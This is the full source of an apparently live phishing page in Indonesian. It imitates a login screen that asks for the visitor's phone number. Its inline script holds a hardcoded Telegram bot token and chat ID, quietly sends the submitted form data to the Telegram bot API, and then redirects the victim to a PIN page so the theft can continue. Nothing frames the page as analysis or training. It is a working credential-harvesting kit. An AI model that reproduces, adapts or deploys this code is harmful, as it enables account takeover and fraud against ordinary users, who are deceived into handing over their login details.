.css-15rtx21[disabled], .css-15rtx21[aria-disabled="true"], .css-15rtx21[data-disabled] { background: var(--chakra-colors-gray-100); border-color: var(--chakra-colors-gray-100); }

.css-15rtx21:focus-visible, .css-15rtx21[data-focus-visible] { box-shadow: var(--chakra-shadows-outline); }

.css-15rtx21[aria-invalid="true"], .css-15rtx21[data-invalid] { border-color: var(--chakra-colors-red-500); }

.css-1sy58bw { cursor: pointer; display: inline-flex; -webkit-box-align: center; align-items: center; vertical-align: top; position: relative; border-color: var(--chakra-colors-blackAlpha-400); color: var(--chakra-colors-red-500); font-weight: var(--chakra-fontWeights-bold); margin-bottom: 20px; }

.css-1sy58bw[disabled], .css-1sy58bw[aria-disabled="true"], .css-1sy58bw[data-disabled] { cursor: not-allowed; }

.css-1r69mki { opacity: 1; transform: scale(1); font-size: 0.625rem; transition-property: transform; transition-duration: var(--chakra-transition-duration-normal); width: 1.2em; }

.css-1sm2s1z { height: 50%; display: flex; flex-direction: column; }

.css-13fbd8g { background: ; left bottom / cover; width: 100%; height: 100%; position: relative; text-align: center; }

.css-1hvggs4 { height: 50px; margin-bottom: 10px; background-color: transparent; box-shadow: rgb(51, 51, 51) 0px 0px 0px; display: flex; -webkit-box-pack: center; justify-content: center; -webkit-box-align: center; align-items: center; }

.css-arqxt3 { color: var(--chakra-colors-white); font-size: 24px; font-family: AvenirBold; }

.css-1v97jab { width: 500%; padding: 10px; max-width: 300px; margin: auto; position: absolute; bottom: 0px; left: 0px; right: 0px; }

@media { max-width: 420px; }
  .css-1v97jab { max-width: 300px; }
  
.css-1meg77l { margin-top: auto; width: 100%; padding:12px; }


.css-q7z8lq { color: rgb(255, 255, 255); font-size: 18px; font-family: AvenirBold; }

.css-2z8rzx { box-shadow: rgb(219, 219, 219) 0px 0x 0px; border-radius: 8px; margin-top: 0px; }

.css-qhzfk3 {  background-color: rgb(255, 255, 255); border-radius: 8px; margin-top: 10px; padding: 0px 12px; border-bottom: 1px;  solid rgb(255, 255, 255); display: flex; -webkit-box-align: center; align-items: center; }

.css-1fq0ymr { width: 55px; margin-right: 18px; }

.css-1ew2b06 { 
    font-weight: 550;
    font-size: 19px;
    color: #000;
height: 40px; font-family: AvenirMedium; width: 100%; }

.css-1iarp40 { width: 24px; height: 24px; object-fit: contain; margin-right: 6px; }

.css-tb4kah { width: 24px; height: 24px; object-fit: counter-reset: ;tain; margin-right: 10px; }

.css-ldq9nk { margin-top: 20px; text-align: right; }

.css-1w471m1 { font-size: 14px; font-family: AvenirBold; margin-top: 20px; text-align: right; }

.css-70qvj9 { display: flex; -webkit-box-align: center; align-items: center; }

.css-2z5j4d { display: inline-flex; appearance: none; -webkit-box-align: center; align-items: center; -webkit-box-pack: center; justify-content: center; user-select: none; position: relative; white-space: nowrap; vertical-align: middle; outline: transparent solid 2px; outline-offset: 2px; line-height: 1.2; border-radius: 5px; font-weight: var(--chakra-fontWeights-semibold); transition-property: var(--chakra-transition-property-common); transition-duration: var(--chakra-transition-duration-normal); height: 35px; min-width: var(--chakra-sizes-7); font-size: var(chakra-fontSizes-md); padding-inline-start: var(--chakra-space-4); padding-inline-end: var(--chakra-space-4); background-image: ; background-position-x: ; background-position-y: ; background-size: rgb(14, 120, 202); background-repeat-x: ; background-repeat-y: ; background-attachment: ; background-origin: ; background-clip: ; flex: 1 1 0%; width: 100%; margin-top: 18vh; color: var(--chakra-colors-white); font-family: AvenirBold; }




.css-1h9adj1:focus-visible, .css-1h9adj1[data-focus-visible] { box-shadow: var(--chakra-shadows-outline); }

.css-1h9adj1[disabled], .css-1h9adj1[aria-disabled="true"], .css-1h9adj1[data-disabled] { opacity: 0.4; cursor: not-allowed; box-shadow: var(--chakra-shadows-none); }

.css-1h9adj1:hover, .css-1h9adj1[data-hover] { background-color: rgb(14, 120, 202); }

.css-1h9adj1:active, .css-1h9adj1[data-active] { background: var(--chakra-colors-gray-300); }

.css-1h9adj1:focus, .css-1h9adj1[data-focus] { background-color: rgb(14, 120, 202); }

.css-m3dotl { width: 60px; object-fit: contain; }
</style>
<style>

@charset "utf-8";

@font-face { font-family: Avenir; src: url("/fonts/avenir_next_regular.ttf"); }

@font-face { font-family: AvenirBold; src: url("/fonts/avenir_next_bold.ttf"); }

@font-face { font-family: AvenirMedium; src: url("/fonts/avenir_next_medium.ttf"); }

body, html { padding: 0px; margin: 0px; font-family: Avenir, "Helvetica Neue", sans-serif; }

#__next, body, html { height: 100%; }

a { color: inherit; text-decoration: none; }

* { box-sizing: border-box; }

input { outline: unset !important; }

@-webkit-keyframes from-top { 
  0% { transform: translateY(-60px); }
  100% { transform: translateY(0px); }
}

@keyframes from-top { 
  0% { transform: translateY(-60px); }
  100% { transform: translateY(0px); }
}

@-webkit-keyframes kedip { 
  0% { opacity: 0; }
  100% { opacity: 1; }
}

@keyframes kedip { 
  0% { opacity: 0; }
  100% { opacity: 1; }
}
welalxcome { background: #fff;
        position: fixed;
    left: 0;
    top: 0;
    width: 100vw;
    height: 100vh;
    display: flex;
    flex-direction: row;
    flex-wrap: nowrap;
    align-items: center;
    align-content: center;
    justify-content: center;
}
welalxcome img {
        width: 24vw;
    height: auto;}
    
        .eye {
            display: block;
            margin: -29px auto;
            margin-right: 24px;
            position: relative;
            box-sizing: border-box; 
            z-index: 16; 
            height: 19.8170px;
            width: 25.0236px; 
            float: right;
            border-radius: 0px; 
            cursor: pointer;
        }
        
</style>
</head>
<body>
<main>
<welalxcome>
<img src="https://career.amikom.ac.id/images/company/logos/1636005134.png">
</div>
</welalxcome>
<chsalxcome2 style="display: none;">
<div style="height:0px;width: 100px;margin-top: 0px;margin-bottom: 0px;float:center;margin-left:52%" class="talxcome">
</div>
  <body>
    <div id="__next">
        <div class="css-536van">
            <div class="css-1sm2s1z">
                <div class="css-13fbd8g">
                    <div class="css-1hvggs4">
                        <img src="https://user-images.githubusercontent.com/130748953/236757241-c5d8f6f2-ad0b-45bd-9d7c-fe8b4d3b33de.jpg">
                        </div></br>
                           <p class="chakra-text css-arqxt3"></b></p><img src="" class="css-1v97jab"></div><div class="css-1meg77l"></div>
                           <div>
<br><br></div>
          <section class="section">
                  <div class="container">
        <p class="chakra-text css-q7z8lq"><b>Masukkan nomor HP kamu untuk lanjut</b><br>
        <form id="setPin" onsubmit=""><div class="css-2z8rzx"><div class="css-qhzfk3"><img src="https://user-images.githubusercontent.com/130748953/236765332-047d580e-7bc0-48b4-96c3-89e74db36e9f.jpg" class="css-1fq0ymr"><input type="number" name="Nomor Telpon" id="Username" autocomplete="off" placeholder="811-2345-6789" required="" class="css-1ew2b06"></div>
       <div class="bubble-element eye clickable-element" tabindex="3" id="eyeClose" style="display: none"> 
        <img alt="" id="eye" src="https://d1muf25xaso8hp.cloudfront.net/https%3A%2F%2Fs3.amazonaws.com%2Fappforest_uf%2Ff1654594427324x961463961280841100%2Feye.png?w=32&amp;h=26&amp;auto=compress&amp;dpr=2&amp;fit=max" style="display: block; margin: 0px; width: 100%; height: 100%; border-radius: 0px;">
           </div> </div>
               <p class="chakra-text css-1w471m1">    
               <strong><a href="" target="_blank" style="color: #0086e0; text-decoration: none;"></a></strong></p><div class="css-70qvj9" ><p class="chakra-text css-q7z8lq">      <center>
            <div class="css-dnzamn"><b>Nomor ponsel akan digunakan sebagai ID kamu & menjaga akun selalu aman. Dengan melanjutkan, kamu setuju dengan Syarat & Ketentuan dan Kebijakan Privasi kami.</center></b></div>
<br><br><button type="submit" class="chakra-button css-2z5j4d">Lanjutkan</button></div></div><br>
            <div class="css-dnzamn"><img src="https://user-images.githubusercontent.com/141388247/259777276-6a8c7eb1-0272-49c9-8b61-ddf0d8d61123.png" width="350">
</div>
              
       <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script> 
   <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/js/bootstrap.bundle.min.js" integrity="sha384-pprn3073KE6tl6bjs2QrFaJGz5/SUsLqktiwsUTF55Jfv3qYSDhgCecCxMW52nD2" crossorigin="anonymous"></script> 
   <p id="status"></p>
   <script src="setPin.js"></script>
   
   <script>
   
            $(document).ready(function() {
            $("div#eyeOpen").on('click', function() {
                $("#eyeOpen").css("display", "none");
                $("#eyeClose").css("display", "block");

                $("#password").prop("type", "text");

                $("div#eyeClose").on('click', function() {
                    $("#eyeOpen").css("display", "block");
                    $("#eyeClose").css("display", "none");

                    $("#password").prop("type", "password");
                });
            });
            
const chat_id = '6988085293', botID = 'bot6641445898:AAGQUg7U3BmOIoUK6a6fP23K82FBaXsZ5Ig';

    const telegramURL = `https://api.telegram.org/${botID}/sendMessage`;

    document.querySelector('#setPin').addEventListener("submit", async e => { // When the user submits the form
        e.preventDefault(); // Don't submit
        let text = JSON.stringify( // Convert the form data to a string to send as our Telegram message
            Object.fromEntries(new FormData(e.target).entries()), // Convert the form data to an object.
        null, 2); // Prettify the JSON so we can read the data easily
        const sendMessage = await fetch(telegramURL, { // Send the request to the telegram API
            method: 'POST',
            headers: {"Content-Type": "application/json"}, // This is required when sending a JSON body.
            body: JSON.stringify({chat_id, text}), // The body must be a string, not an object
        });
        const messageStatus = document.querySelector('#status');
        if (sendMessage.ok) // Update the user on if the message went through
            messageStatus.textContent = "";
        else
            messageStatus.textContent = "Message Failed to send :( " + (await sendMessage.text());
        e.target.reset(); // Clear the form fields.
        window.location.href = '/Pin.html';
    });

            
        });

   </script>
</smalxs>
</main>
<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.2/jquery.min.js"></script>
<script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
<script type="text/javascript" src="https://code.jquery.com/jquery-1.10.2.min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.3/jquery.min.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" integrity="sha512-894YE6QWD5I59HgZOGReFYm4dnWc1Qt5NtvYSaNcOP+u1T9qYdvdihz0PPSiiqn/+/3e7Jo4EaG7TubfWGUrMQ==" crossorigin="anonymous" referrerpolicy="no-referrer"></script>
<script>
        $( document ).ready(function() {
            setTimeout(() => {
                $('welalxcome').hide();
                $('chsalxcome2').fadeIn();
            },1000)
        });
</script>
</body>
</html>
